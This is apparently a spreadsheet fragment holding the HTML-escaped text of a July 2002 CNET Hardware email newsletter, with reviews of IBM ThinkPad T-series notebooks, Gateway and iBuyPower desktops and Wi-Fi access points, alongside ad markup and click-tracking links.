 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IBM's thin ThinkPads fit to a T
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Hardware Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;&lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;
     	&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/442_computersHEAD_NWSLTR.gif" width="442" height="60" border="0" alt="CNET Computers.com Newsletter"&gt;&lt;br&gt;
         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
         	&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
             &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /shopping --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdLN498aDYlcGhVIlcU_ZR" &gt;Samsung ML-1430&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xKPgfp8qJzDxDXozLCdR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkU3Yh4WSjg0SxiPZvH6cR" &gt;Unitech 2U4U DMR-300&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWaO-TNtE6tTbDS-BJjhoRR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwj9EuMSxCs3CyJqsjeoFR" &gt;Video Explosion Deluxe&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlc4KmHg3F-erCpGY99R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUXy36LoxCjjvDSwizzlR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VDrfs2YKns2asfI8Uk4R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 	&lt;form method=get action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 			&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 			&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 			&lt;select name=target class=frmel&gt;
 			&lt;!-- &lt;option value="http://hardware.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;Computers --&gt;
  				&lt;option value="http://computers.cnet.com/hardware/search/1,10121,0-1016-401-0,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=1016"&gt;Computers
  				&lt;option value="http://cnet.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;All CNET
  				&lt;option value="http://www.search.com/search?tag=ex.computers.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt; 
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/form&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;   
 	&lt;/td&gt;&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_c.gif"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&lt;/td&gt;&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 			&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;!-- promo section --&gt;
 		&lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;
 			&lt;img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valign=top&gt;&lt;td width=10&gt;
 					&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=412&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 10, 2002&lt;/font&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 						&lt;tr valign=top&gt;&lt;td width=76 align=right&gt;
 							&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/66x86_TOMD.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 							&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 							--Tom Dunlap&lt;br&gt;
 							Senior editor&lt;br&gt;
 							CNET Hardware&lt;br&gt;&lt;/font&gt;
 							&lt;/td&gt;&lt;td width=10&gt;&lt;/td&gt;
 							&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 								&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 								&lt;font size="-1"&gt;
 Hey, it's not all bad news in the corporate world. One definite
 business success story is Big Blue's ThinkPad T series. These
 versatile and speedy thin-and-light notebooks share a sturdy,
 well-designed black case and come in so many configurations that
 you can find one that's right for just about any use. They also
 range in price from $2,199 to a hefty $3,499.  For a comprehensive
 look at this line of notebooks, check out our verdict.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfS5iy4Qaf70SVbToBBuR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;
 &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2pCWI8d0dAVJ9PZAKTFR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;/td&gt;&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table cellpadding=0 width="100%"&gt;
   				&lt;tr&gt;&lt;td align=center&gt;
       				&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 	    				&lt;tr&gt;&lt;td align="center" colspan="5"&gt;
 							&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" alt="advertisement"&gt;&lt;/td&gt;&lt;/tr&gt;
         				&lt;tr valign="middle"&gt;&lt;td colspan="5" bgcolor="#999999" height="15"&gt;
 							&lt;font face="verdana,geneva,helvetica" size="-2" color="#ffffff"&gt;&lt;b&gt;click  here for details&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;tr valign="middle" align="center" bgcolor="#eeeeee"&gt;
 		  					&lt;td height="35"&gt; &lt;/td&gt;
 		  					&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-dell&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3ddell%2bhome&gt;
 		  						&lt;INPUT type=submit value="     Dell     "&gt;&lt;/td&gt;&lt;/form&gt;
 		  						&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-gateway&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3dgateway&gt; 
 		  						&lt;INPUT type=submit value=" Gateway "&gt;&lt;/td&gt;&lt;/form&gt;
 							&lt;td&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 	  				&lt;/table&gt;    
 					&lt;/td&gt;
   				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;br&gt;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href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-Su8ef6dxQMKtNX8PQ9R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/050202chipart.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-d0AJ_zSROUJEymxquR" &gt;&lt;b&gt;Intel's new insides&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_nG49sjbjsMVKpv3DxsR" &gt;Gateway 300 series keeps PCs simple
 &lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvF_A1BKqBxDVAmoBamZR" &gt;Modernize your motherboard&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQ6EUdA98BbBL7kOi_dR" &gt;Gateway 700XL&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOrmJMmlKMZ2Fz8IR7XcR" &gt;Dell Dimension 4000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vtOYWpMktQ3DlPfP8NRR" &gt;HP Pavilion 950&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEmpV_lv9Z5VKc-3P0BlR" &gt;Alienware Aurora DDR&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwWdo9CHYjKHbtbXYzH4R" &gt;Falcon Northwest Mach V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bRnfb9QA5K-fxuEL5iR" &gt;See all most popular desktops&lt;/a&gt;&lt;/b&gt;&lt;br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
 &lt;!-- /Leads Module --&gt;
 			&lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 					&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/sub_rev.gif" alt="Reviews" width="125" height="19" border="0"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- item 1 --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFki8ghtuoAABMMPZ9FR" &gt;IBM's thin ThinkPads fit to a T&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The ThinkPad T-series notebooks are fast, and they offer a great
 design, innovative features, and good support. For a comprehensive
 look at this line of notebooks, check out our verdict.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabm_dqsFCW5CH7esbKR9R" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;
 &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45yJN3cQhaIHsSzky0uR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;br clear="left"&gt;&lt;br&gt;
 &lt;!-- item 2 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7ThEon9gVnxXFZcIuIsR" &gt;Inside the Labs: The PC of the future, part two&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Mira, a flat-panel display that wirelessly connects to a PC, will
 let you take your system anywhere in your house--or so Microsoft
 promises. This is just one of the coming-soon-to-a-living room-near
 -you technologies that Microsoft promoted at its annual hardware
 summit. Labs Manager Daniel A. Begun has the scoop on the next
 batch of Microsoft-promoted technologies that could change the way
 consumers use their PCs.
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;!-- item 3 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvIwIvrmkSWreAgRDc9R" &gt;Gateway 300 series keeps PCs simple&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Gateway's most basic desktop line offers some good values for
 students and families buying second computers for their children--
 if you configure carefully. But if you're eyeing the fancy LCD and
 DVD-ROM drive options, get a fancier PC to go with them. Find out
 why in our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7Y6yU6ixv3orMjEsaQuR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YNw_8J_XGuwrfzJ6nsR" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 4 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfbdJabdIz4s1RhjGRsZR" &gt;Midrange iBuyPower PC suffers from low-end blues&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The generic iBuyPower Argous has some nice features, but it lacks
 the performance, the support, and the finishing touches delivered
 by similarly priced competitors. Read our review to find out where
 it falls short--and which systems in this price range present
 better alternatives.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7XNt1Kjc-r7MBvWpjudR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGO8E1hU5CfCkxHB0FrR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 5 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9Y6tpFIrctPQDwwaMCiR" &gt;Add wireless networking for $200 or less&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Wi-Fi (802.11b) access points provide the cheapest, easiest way to
 extend your wired or wireless network to the far-flung reaches of
 your home or office. Check our reviews of access points from Agere
 Systems, Belkin, and D-Link to see which is the cheapest, which has
 the best security, and more.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwxr4gOI80ywQ-4d0P6lR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- what's new --&gt;
 &lt;p&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/HEAD_WHATSnew.gif" width="175" height="19" border="0" alt="Whats New?"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;the hottest products this week&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kilz3F6ooaDkjVsTLZ89R" &gt;Cendyne 48X/12X/48X EIDE&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJolT99rHr1yZeU_u_KnuR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;95ms access time; 2MB cache
 &lt;p&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2w_sl14WLXZBXqONOVsR" &gt;IBM ThinkPad R32&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2zC4cck_41H99K8FZuS9R" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;Pentium 4-M-1.8GHz; 256MB RAM; 30GB hard drive
 &lt;p&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1adBCY2OHCu4jNix1DPuR" &gt;Toshiba Satellite 5105-S502&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4NaEtrHJAwQ4lAUw-5WsR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;P4-1.7GHz; 512MB RAM; 40GB hard drive
 &lt;p&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4e4yDiM9ZxrhBm0WHthZR" &gt;Sony GDM FW900&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaB8NVcn8ZvQIzTKtR1dR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;24 inches of new viewing bliss; built-in USB hub
 &lt;p&gt;&lt;/font&gt;
 &lt;p&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/HEAD_USERreviews2.gif" width="175" height="19" border="0" alt="User reviews"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;Overheard on Computers.com&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;font face="arial, helvetica"&gt;
 &lt;font size="-1"&gt;&lt;br&gt;
 "Simply wow!"&lt;br&gt;
 "Now this is an awesome machine"&lt;br&gt;
 "Slick, spartan design--raw power"&lt;br&gt;
 "Powerful, solid, and durable"&lt;br&gt;
 "Love it--oh, what a programmer's keyboard!"&lt;br&gt;
 "Best of the best"&lt;br&gt;
 "Reliably fast with beautiful screen"
 &lt;p&gt;
 Click &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHoSdfIPNyGEI9rCM8vcR" &gt;here&lt;/a&gt; to find out what this mystery product is.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXejhvHIj_7DQESNPe-iRR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pyqMXAnjHpx8lOheMnlR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 Click &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhmFxz-8ywvjsK-FdLP4R" &gt;here&lt;/a&gt; to see more of CNET's User Opinions.
 &lt;p&gt;&lt;/font&gt;
 &lt;p&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/HEAD_MESSAGEbrds.gif" width="175" height="19" border="0" alt="CNET Message Boards"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPd2qs-5iUywq2NRJSBTeR" &gt;CNET Message Boards: Computer Help is here&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 Stumped by computer hardware and software problems? Never fear;
 check out the CNET Message Boards, where quick help is just a post
 away. Join us in the Computer Help forums.
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://www.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://www.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQTaovnB5cTYjvQ8Rgn5FR" &gt;Live tech help: submit your questions now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZk8FiQEHVDtZs6swzdON9R" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pyt8o7KMOpAEVgnfqGsJuR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlbzNAe03Gl22vbAOyesR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfBpdRKWVqS8CMB0qvsZR" &gt;May Editors' Choice award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 		 &lt;br&gt;&lt;!-- End search box --&gt;
     	&lt;/td&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4cdWapya9-0t3VVat9dR" &gt;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HREF='http://clickthru.online.com/Click?q=11-l8nizo-8PmRfUxbq36lJuHDmqObzbsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://www.cnet.com/subscription/0-16335-7-8494915.html?EmailAddr=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org'&gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
